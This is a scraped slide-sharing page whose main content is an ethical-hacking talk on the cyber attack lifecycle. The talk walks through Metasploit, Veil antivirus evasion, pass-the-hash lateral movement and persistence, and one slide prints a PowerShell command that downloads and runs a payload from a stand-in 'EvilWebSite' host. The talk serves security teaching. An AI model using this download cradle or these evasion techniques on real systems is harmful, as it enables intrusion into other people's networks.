An attacker conducts a penetration test against a target organization. They first find vulnerabilities in the organization's SAP BO deployment, including default credentials and directory traversal issues, which allows them to upload a backdoored web service. This gives them code execution on a web server. To further their access, the attacker creates a privileged temporary account and establishes a reverse SSH tunnel to bypass blocked ports to access systems on the internal network.
The Cyber Attack landscape is evolving with new attack vectors and dangerous trends that can affect the security of your business. Some attacks can take only minutes to complete, yet months to be discovered.
Determine your attack risk and learn what to look for in a quality cyber attack defense.
Please visit here: http://www.radware.com/social/amn/ for information on Radware's AMN (Attack Mitigation Network.
What are cyber attacks?
In simple terms, cyber attacks are attempts of disabling or stealing information from other computers, by gaining access to admin privileges to them.
Why should businesses be worried?
An average ransomware attack costs a company $5 million. Attackers target all types of businesses, small and large, healthcare, banking & finance, manufacturing, education, even government. The internet has made life a lot easier for business owners, at the same time it has made them easier to get hacked.
The Cyber Attack landscape is evolving with new attack vectors and dangerous trends that can affect the security of your business. Some attacks can take only minutes to complete, yet months to be discovered.
Determine your attack risk and learn what to look for in a quality cyber attack defense.
Please visit here: http://www.radware.com/social/amn/ for information on Radware's AMN (Attack Mitigation Network.
What are cyber attacks?
In simple terms, cyber attacks are attempts of disabling or stealing information from other computers, by gaining access to admin privileges to them.
Why should businesses be worried?
An average ransomware attack costs a company $5 million. Attackers target all types of businesses, small and large, healthcare, banking & finance, manufacturing, education, even government. The internet has made life a lot easier for business owners, at the same time it has made them easier to get hacked.
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...Luigi Delgrosso
Recorded Webinar at http://event.on24.com/wcc/r/1117340/BECF92C8BBDF5B51399A8FB934C97054
This Webinar has been hold in Italian language by Luigi Delgrosso and Fabrizio Patriarca.
Please contact them to get additional details and get a visit on site
Security Attack Analysis for Finding and Stopping Network AttacksSavvius, Inc
Network breaches are on the rise, and the consequences are getting more dire. Needless to say, you don't want to be the next Target.You've invested in security tools like firewalls and IPS systems. But today's stealthy attacks can still get through. When you suspect an attack, you need your insurance policy—network forensics.
In this seminar, you'll learn how network forensics—network recording along with powerful search and analysis tools—can enable your in-house security team to track down, verify, and characterize attacks.
You'll also learn about the requirements for effective forensics on today's 10G and 40G networks.
And you'll learn some best practices for configuring captures to help you and your team pinpoint and remediate anomalous behavior that could signal an attack.
Cambodia CERT Seminar: Incident response for ransomeware attacksAPNIC
Senior Security Specialist Adli Wahid presents on incident response for ransomeware attacks at the Cambodia CERT Seminar, held online on 13 August 2021.
Sophisticated Attacks vs. Advanced Persistent SecurityPriyanka Aash
It appears that any successful attack these days is labeled, Sophisticated. The implication is that the attacks were unpreventable. The reality is very different. We dissect recent attacks, and then go through how they could have been prevented. Advanced Persistent Security principles are applied to demonstrate how even successful breaches can be contained to significantly reduce loss.
(Source: RSA USA 2016-San Francisco)
What is cyber security. Types of cyber attacks. Web based attacks. System based attacks. Injection attack, Cross-site scripting attack, DNS spoofing, Denial-of-service attack, brute force attack, virus, worms, Trojan horse.
The top two attack vectors for malware are email and web browsers. Watering-hole attacks conceal malware on member-based sites and phishing scams can target individuals with personal details. This PPT describes a different security approach to protect against these threats while achieving business growth, efficiency and lowered expenses. The presentation features Cisco Email, Web and Cloud Web Security and covers basic features, offers, benefits, newest features and product integrations. Watch the webinar: http://cs.co/9004BGqvy
WannaCry Ransomware Attack: What to Do NowIBM Security
View on-demand webinar: http://bit.ly/2qoNQ8v
What you need to know and how to protect against the WannaCry Ransomware Attack, the largest coordinated cyberattack of its kind. WannaCry has already crippled critical infrastructure and multiple hospitals and telecommunications organizations, infecting 100s of thousands of endpoints in over 100 countries. In this on-demand webinar, we discuss the anatomy of this unprecedented attack and IBM Researchers share expert insights into what you can do now to protect your organization from this attack and the next one.
IT security in 2021: Why Ransomware Is Still The Biggest ThreatETech 7
What’s next for cybersecurity in 2021? Last year, both the public and the private sector experienced a plethora of breaches and attacks. From regular security lapses to more complicated, and often more expensive, ransomware attacks - 2020 has seen a drastic increase in the volume of breaches that led to the widespread loss of data and valuable information around the world.
The CEH v11 program provides an in-depth understanding of ethical hacking phases, various attack vectors, and preventative countermeasures. It will teach you how hackers think and act maliciously so that you will be better positioned to set up your security infrastructure and defend against future attacks.
Zero-Day Vulnerability and Heuristic AnalysisAhmed Banafa
A zero day vulnerability refers to a hole in software that is unknown to the vendor. This security hole is then exploited by hackers before the vendor becomes aware and fix it. Uses of zero day attacks can include infiltrating malware, spyware or allowing unwanted access to user information.
The term “zero day” refers to the unknown nature of the hole to those outside of the hackers, specifically, the developers. Once the vulnerability becomes known, a race begins for the developer, who must protect users.
As the number and severity of cyber-crimes continues to grow, it’s important to understand the steps cyber-criminals take to attack your network, the types of malware they use, and the tools you need to stop them. The basic steps of a cyber attack include reconnaissance (finding vulnerabilities); intrusion (actual penetration of the network); malware insertion (secretly leaving code behind);
and clean-up (covering tracks).
Malware comes in various forms, some more nefarious than others, ranging from annoying sales pitches to potentially business-devastating assaults. Dell SonicWALL offers comprehensive solutions to counter every stage of cyber attacks and eliminate every type of malware from disrupting your business network.
The course gives a professional and academic introduction to computer and information security using the ethical hacking approach, which enables improved defence thanks to adopting an attacker mindset when discovering vulnerabilities, hands-on experience with different attacks, facilitates linking theory and practice in significant areas of one’s digital literacy, and can therefore be utilized by (future) security professionals, (informed) decision-makers, (savvy) users and developers alike.
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...Luigi Delgrosso
Recorded Webinar at http://event.on24.com/wcc/r/1117340/BECF92C8BBDF5B51399A8FB934C97054
This Webinar has been hold in Italian language by Luigi Delgrosso and Fabrizio Patriarca.
Please contact them to get additional details and get a visit on site
Security Attack Analysis for Finding and Stopping Network AttacksSavvius, Inc
Network breaches are on the rise, and the consequences are getting more dire. Needless to say, you don't want to be the next Target.You've invested in security tools like firewalls and IPS systems. But today's stealthy attacks can still get through. When you suspect an attack, you need your insurance policy—network forensics.
In this seminar, you'll learn how network forensics—network recording along with powerful search and analysis tools—can enable your in-house security team to track down, verify, and characterize attacks.
You'll also learn about the requirements for effective forensics on today's 10G and 40G networks.
And you'll learn some best practices for configuring captures to help you and your team pinpoint and remediate anomalous behavior that could signal an attack.
Cambodia CERT Seminar: Incident response for ransomeware attacksAPNIC
Senior Security Specialist Adli Wahid presents on incident response for ransomeware attacks at the Cambodia CERT Seminar, held online on 13 August 2021.
Sophisticated Attacks vs. Advanced Persistent SecurityPriyanka Aash
It appears that any successful attack these days is labeled, Sophisticated. The implication is that the attacks were unpreventable. The reality is very different. We dissect recent attacks, and then go through how they could have been prevented. Advanced Persistent Security principles are applied to demonstrate how even successful breaches can be contained to significantly reduce loss.
(Source: RSA USA 2016-San Francisco)
What is cyber security. Types of cyber attacks. Web based attacks. System based attacks. Injection attack, Cross-site scripting attack, DNS spoofing, Denial-of-service attack, brute force attack, virus, worms, Trojan horse.
The top two attack vectors for malware are email and web browsers. Watering-hole attacks conceal malware on member-based sites and phishing scams can target individuals with personal details. This PPT describes a different security approach to protect against these threats while achieving business growth, efficiency and lowered expenses. The presentation features Cisco Email, Web and Cloud Web Security and covers basic features, offers, benefits, newest features and product integrations. Watch the webinar: http://cs.co/9004BGqvy
WannaCry Ransomware Attack: What to Do NowIBM Security
View on-demand webinar: http://bit.ly/2qoNQ8v
What you need to know and how to protect against the WannaCry Ransomware Attack, the largest coordinated cyberattack of its kind. WannaCry has already crippled critical infrastructure and multiple hospitals and telecommunications organizations, infecting 100s of thousands of endpoints in over 100 countries. In this on-demand webinar, we discuss the anatomy of this unprecedented attack and IBM Researchers share expert insights into what you can do now to protect your organization from this attack and the next one.
IT security in 2021: Why Ransomware Is Still The Biggest ThreatETech 7
What’s next for cybersecurity in 2021? Last year, both the public and the private sector experienced a plethora of breaches and attacks. From regular security lapses to more complicated, and often more expensive, ransomware attacks - 2020 has seen a drastic increase in the volume of breaches that led to the widespread loss of data and valuable information around the world.
The CEH v11 program provides an in-depth understanding of ethical hacking phases, various attack vectors, and preventative countermeasures. It will teach you how hackers think and act maliciously so that you will be better positioned to set up your security infrastructure and defend against future attacks.
Zero-Day Vulnerability and Heuristic AnalysisAhmed Banafa
A zero day vulnerability refers to a hole in software that is unknown to the vendor. This security hole is then exploited by hackers before the vendor becomes aware and fix it. Uses of zero day attacks can include infiltrating malware, spyware or allowing unwanted access to user information.
The term “zero day” refers to the unknown nature of the hole to those outside of the hackers, specifically, the developers. Once the vulnerability becomes known, a race begins for the developer, who must protect users.
As the number and severity of cyber-crimes continues to grow, it’s important to understand the steps cyber-criminals take to attack your network, the types of malware they use, and the tools you need to stop them. The basic steps of a cyber attack include reconnaissance (finding vulnerabilities); intrusion (actual penetration of the network); malware insertion (secretly leaving code behind);
and clean-up (covering tracks).
Malware comes in various forms, some more nefarious than others, ranging from annoying sales pitches to potentially business-devastating assaults. Dell SonicWALL offers comprehensive solutions to counter every stage of cyber attacks and eliminate every type of malware from disrupting your business network.
The course gives a professional and academic introduction to computer and information security using the ethical hacking approach, which enables improved defence thanks to adopting an attacker mindset when discovering vulnerabilities, hands-on experience with different attacks, facilitates linking theory and practice in significant areas of one’s digital literacy, and can therefore be utilized by (future) security professionals, (informed) decision-makers, (savvy) users and developers alike.
Looking to understand how hackers and other attackers use cyber technology to attack your network and your executives? This slide set provides an overview and details the anatomy of a cyber attack, and the strategies you can use to manage and mitigate risk.
In this presentation i have given the overview of different kind of cyber attacks or crimes, Email frauds ,fake mails ,how to create it and how to prevent it and different types of software's used for spying.......
Webinar: Get Ready to Detect, Respond & Recover from a Cyber AttackAujas
It is given that you will be hacked, irrespective of your level of cyber security. Learn how you can detect, respond & recover from cyber attacks. Quicker.
Key Content:
1. The threat landscape and how existing monitoring and response capabilities are ineffective in detecting and responding to advanced cyber attacks
2. Lifecycle and speed of an attack and how early detection can help in responding and managing losses
3. Blueprint for an effective (and vendor agnostic) Incident Management Program
If you have been tracking the Cyber Security News lately, one thing is for sure - Cyber Attacks are imminent and it is a matter of time when you will be the next one to come under an attack, if not already.
What Robert Mueller, Former Director of FBI said in RSA Conference in March 2012 is still very relevant.
"I am convinced that there are only two types of companies: those that have been hacked and those that will be. ” and what he says further makes it worse "And even they are converging into one category: companies that have been hacked and will be hacked again."
Cyber attacks are no more a work of lone warriors or a group of hackers but involve cyber crime syndicates, collaborating and pumping large amount of money, precision, knowledge, expertise and persistence. Their capabilities are equal if not better than state sponsors.
Data says that cyber security incidents affects all kinds of organizations - small, medium or large and across all industries - financial, telecom, utility, health care, education and more. Organizations fail to detect and respond to security incidents due to weak monitoring capabilities and lack of expertise, tools and procedures.
In this webinar we will look at the cause and effect of the problem, analyze preparedness and learn how you can better prepare, detect, respond and recover from cyber attacks.
The term ‘Cyberspace’ encapsulates fascinating technologies such as 3D displays,
Augmented Reality and Virtual Reality as well as simply surfing
the web. Therefore Cyberspace is a relevant concept to almost everyone even today.
• Why are we attracted to Cyberspace?
• The moral issues and aspects faced in Cyberspace
• Hierarchies of realities and Platos' concept of 'Ideas'
• Rene' Descartes and scepticism - Can we differentiate between realities?
• Are we faced with the worst drugs ever known to mankind?
Introduction to cyber security by cyber security infotech(csi),
Information Security,
website development company,
Employee Monitoring System,
Employee Monitoring Software
Media Technology and Society - Cyber SocietyFaindra Jabbar
Media Technology and Society
Topic: Cyber Society
Cyberspace
Cyber Society
Positive impact of Cyberspace
Negative impact of Cyberspace
Social Media
Web 2.0
This presentation gives a brief idea on how coalition politics is
major driving force behind corruption.It contains facts,graphics,history,etc about the same.Most of the aspects are presented in context of India.
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingMuhammad FAHAD
The “cyber kill chain” is a sequence of stages required for an
attacker to successfully infiltrate a network and exfiltrate data
from it. Each stage demonstrates a specific goal along the attacker’s
path. Designing your monitoring and response plan around the cyber kill chain model is an effective method because it focuses on
how actual attacks happen.
The Certified Ethical Hacker (C|EH v12) program is one of the most respected certifications in the cybersecurity field.
https://www.infosectrain.com/courses/certified-ethical-hacker-ceh-training/
The EC-Council’s Certified Ethical Hacker (CEH v12) Training program will enhance your knowledge of essential security fundamentals. Certified Ethical Hacker (CEH V12) certification course is one of the most sought-after security qualifications in the world. This internationally recognized security course validates your ability to discover weaknesses in the organization’s network infrastructure and aids in the effective combat of cyber-attacks.
This is an introductory course that is developed with the objective of laying the foundation stone which can potentially transform into a career in the cyber security space....
This is an introductory course that is developed with the objective of laying the foundation stone which can potentially transform into a career in the cyber security space....
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
PowerPoint Presentation On Ethical Hacking in Brief (Simple) Easy To Understand for all MCA BCA Btech Mtech and all Student who want a best powerpoint or seminar presentation on Ethical Hacking
This is a presentation I gave to senior high school students. The 1st part is an overview the 2nd part is more detailed on the ways to perform the Ethical Hacking.
Need my help? Contact Keith Brooks via one of the following ways:
Blog http://blog.vanessabrooks.com
Twitter http://twitter.com/lotusevangelist
http://about.me/keithbrooks
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
Similar to Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016 (20)
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
2. Agenda
• Objectives
• Introduction
• Cyber Attack Lifecycle
• Vulnerabilities and Exploitation
• Example of a penetration test scenario
• Conclusion
4. Objectives
Get insights on the methodologies used during a Cyber Attack
Understand how hackers penetrate a network, elevate their
privileges, maintain persistence and hide their malicious
activities
Show hands-on:
Provide a concrete example using Metasploit tool
Show a Demo in real time
Deep dive into a real life pentesting exercise
Understand what can be done to protect against cyber attacks
6. Introduction
Frédéric De Pauw
Co-Founder / Offensive Security @Avanguard
Ethical Hacker
Head IT Security @Ethias
Freelance Ethical Hacker (BE – LUX – US)
https://be.linkedin.com/in/fdepauw
7. Introduction
What is Cyber Crime?
Computer crime, or cybercrime, is crime that involves a
computer and a network
Two types of Cyber Crime:
Technology is the Target. Enterprise, State systems,
personal systems
Technology is the Instrument. Criminal activities on
Internet
This session is focused on the first type
8. Introduction
Technology = Target Technology = instrument
Distributed Deny of Service Pedopornography
Hacking incitement to racial hatred
Malwares, Ransomwares Incitement to terrorism
Phishing Money Laundering
Hacktivism Drug sell
… Spam
…
9. Introduction Cyber Crime
Drastically evolved over the past years, following the global evolution of ICT
supporting human activity
Allow cyber criminals to make profit equivalent as other types of criminality
Offers some advantages over other criminal activities: anonymity, discretion,
borderless
Remain little fought and with no international legislation
Has evolved to cyber war with state-sponsored attacks
Will affect our life (connected cars, Operational Technologies, IOT)
Cost of Cyber Crime in Belgium: 3,5 billion Euros
10. Introduction
• Evolution of Cyber Crime
S
O
P
H
I
S
T
I
C
A
T
I
O
N
1985-1995
Entertainment
First Worms
Phone Hacking
2010-2016-…
Hacktivism
Virus Spread
Website Defacement
Organized Crime
DDOS
Company Systems Hacking
Data Lead
Industrial espionage
Cyber War
Targeted Attacks
State-Sponsored Attacks
11. Introduction
Future of Cyber Crime
Intensification of targeted cyber attacks against enterprises with important impacts
(financial, image..)
Predominance of Advanced Persistence Threats targeting the end user
Intensification of cyber war / cyber espionage activities between nations
Increase of cyber crime targeting connected objects and operational technologies
Hacking of a plane - 2015
Hacking of a pacemaker - 2013
Cars hacking - 2015
12. Introduction
Legal evolution
General Data Protection Regulation (GDPR) – adopted end of 2016 –
comes into force 25 may 2018
Circulars of National Bank of Belgium
Regulation for financial sector
Data Breach notification standard
Within 72 hours
Fines in case of data leak
Max 4% of turnover, maximum 20 M€
14. Cyber Attack Lifecycle
- Public Information
- Social Networks
- Vulnerability Scanning
- Physical Observation
1 Reconnaissance 2 Initial Infection
- Vulnerabilities
- Virus / Malware
- Social Engineering
- Physical Intrusion
3 Gain Control 4 Privilege Escalation
Control infected system
5 Lateral Movement
Compromise more systems
deeper in the network
7 Malicious Activities
Data Exfiltration
Hacking Websites
Money Extortion
..Gain elevated privileges on the
infected system
6 Persistence
Maintain persistent connection
with infected systems
15. Cyber Attack Lifecycle
> Reconnaissance
Reconnaissance process is a key activity
Indeed, during this phase crucial information are obtained in order to
perform a cyber attack
For instance, information will be used to determined the best attack vector
to be used
Activities performed are:
Collect information concerning the target (websites, telephone numbers,
general mailboxes..) through public information
Collect information through direct contact sur as phone calls (fake poll, job
seeker..)
Collect technical information concerning the target information system
(exposed systems, partners, data centers..)
Collect information on premises (garbage, WIFI scanning..)
Actively scan enterprise networks exposed on Internet
18. Cyber Attack Lifecycle
> Reconnaissance
Following reconnaissance activities, attackers must have obtained enough information
in order to determine best attack vectors in order to perform the initial infection phase
For instance:
Vulnerabilities infecting systems exposed on Internet
Lack of physical access to facilities
Social engineering attack on selected profiles from, for instance, social networks information
19. Cyber Attack Lifecycle
> Initial Infection
Initial Infection is aimed at obtaining a first backdoor within the target
information system
Vectors:
Exploiting a vulnerability affecting the victim’s system(s)
Infection through Virus / Malware
Exploiting a physical vulnerability
Installing rogue access points or devices
22. Cyber Attack Lifecycle
> Initial Infection
IDS/IPS Bypass
Encryption
Anti-Virus Bypass
Use simple Powershell as a dropper which fetches an encrypted payload
over Internet
powershell.exe "IEX ((new-object
net.webclient).downloadstring('http://EvilWebSite/payload.txt '))
Unknown Viruses
Use Staging to decouple payload from initial dropper.
The dropper is injected directly into memory
Firewall Bypass
Uses “reverse” connections which connect to the C&C
E.g. HTTPS passing through the Enterprise Proxy
23. Cyber Attack Lifecycle
> Initial Infection
Free tool for malware code obfuscation
VEIL Evasion Framework
Generate obfuscated payload using several methodologies
Metasploit Meterpreter payloads
Generate payloads from different sources
C/C++ shellcode
Powershell shellcode
Python shellcode
24. Cyber Attack Lifecycle
> Initial Infection
Metasploit + Veil framework
Create a Meterpreter backdoor obfuscated with VEIL
Powershell type
25. Cyber Attack Lifecycle
> Initial Infection
Metasploit + VEIL Framework
Create a Meterpreter backdoor using VEIL for Antivirus Avoidance
Embed the Virus in a Word Macro, or create a .bat, include payload
or fetch the payload on a Web Server
27. Cyber Attack Lifecycle
> Initial Infection
Start the Listener on Metasploit
More during the Demo
28. Cyber Attack Lifecycle
> Gain Control
Once initial infection is performed, the objective is to get control
over the machine.
For this a network connection must be established between the
victim and the Command & Control Server
In general « reverse » connection is made to bypass inbound
Firewall protection
Several techniques to bypass Outbound filtering (if present.)
29. Cyber Attack Lifecycle
> Gain Control
Standard Enterprise security principles for Outbound filtering:
Default policy is to deny all outbound connections
Allowed outbound connections must go through a proxy
Outbound connections must conform to the expected protocol
Outbound connections must pass other checks as well.
Outbound filtering evasion techniques examples
Reverse HTTP and / or HTTPS traffic (without or with Proxy settings
verification
Payload Staging over DNS by setting the payload into TXT Records of a
Domain
30. Cyber Attack Lifecycle
> Gain Control
Metasploit / Meterpreter
Meterpreter is an advanced, dynamically extensible payload that
uses in-memory DLL injection stagers and is extended over the
network at runtime. It communicates over the stager socket and
provides a comprehensive client-side Ruby API. It features
command history, tab completion, channels, and more.
31. Cyber Attack Lifecycle
> Privilege Escalation
Escalate privileges from infected machines in order gain elevated access
Typical example is getting Administrator or System privileges
Several techniques
« Local Exploits » from local applications on the infected machine
Manual search for credentials in scripts
Password Hashes dump (e.g. SAM, /etc/passwd) and cracking
Authenticated Sessions grabbing (e.g. VPN Sessions)
SSH Keys
World Writeable files
Read command history files
Batches / Jobs alteration
Process Injection
Try injecting malicious code in processes running under « Domain Admin » privileged user
32. Cyber Attack Lifecycle
> Privilege Escalation
Metasploit: « Incognito » module
Allows to impersonate authentication tokens on compromised windows hosts
Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see
interesting authentication tokens
TIP: File servers are virtual treasure troves of tokens since most file servers are used
as network attached drives via domain logon scripts
33. Cyber Attack Lifecycle
> Lateral Movement
From Infected systems, try to infect more systems deeper in the
Network
Basically repeat the cyber Attack Lifecycle process (recon, initial
infection, privilege escalation…)
Aim for high value systems, windows domain controllers, file servers..
Techniques
Credential re-use / pass-the-hash / SSH keys re-use
Internal applications vulnerabilities (less often patched)
Network segmentation issues between environments ( e.g. Port 445) – PsExec
with Pass-The-Hash
34. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Basically using the first compromise to allow and even aid in the
compromise of other otherwise inaccessible systems
35. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Use Autoroute to make the compromised host a pivot to other
networks
36. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Scan the network through the route created on ports 139 & 445
37. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Start a new session on a new host using PsExec and “Pass-The-Hash”
technique re-using local Administrator password hash
38. Cyber Attack Lifecycle
> Maintain Persistence
Prevent loss of connection between infected machines and the C&C
Techniques
Create jobs / schedule tasks
Create service running on startup
Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
Bootkit / Rootkit
Default file association
Logon Scripts
Modification of Applications / Services
Registry RUN keys
39. Cyber Attack Lifecycle
> Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the
compromised host boots
40. Cyber Attack Lifecycle
> Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the
compromised host boots
41. Cyber Attack Lifecycle
> Demo
Social Engineering scenario
Send a « Virus » to the victim which consists of a Metasploit
Meterpreter instance
Undetected by up to date commercial antivirus
1. Prepare Malware
& environment
2. Send Malware
3. Execute Malware
4. Get infected & Contact C&C
5. Interact
43. Vulnerabilities and Exploitation
A vulnerability is a flaw in a system which allows a malicious user to compromise its
Confidentiality, Integrity and / or its availability
Simple – Default Password. Complex – Buffer Overflow in an application
Dozens of new vulnerabilities officially classified everyday
http://www.cvedetails.com
Dozen of others are not disclosed!
0DAY – Vulnerabilities not discovered, or not disclosed
Vulnerabilities are discovered by
Researchers, students (Ethical Hackers)
Professional researchers ( Vulnerability Brokers )
http://www.zerodayinitiative.com/
France- Vupen Security – Sells vulnerabilities to NASA
Cyber Criminals( 0DAYS )
44. Vulnerabilities and Exploitation
Full Disclosure principle
Vulnerabilities are reported and published publicly as soon as discovered without taking
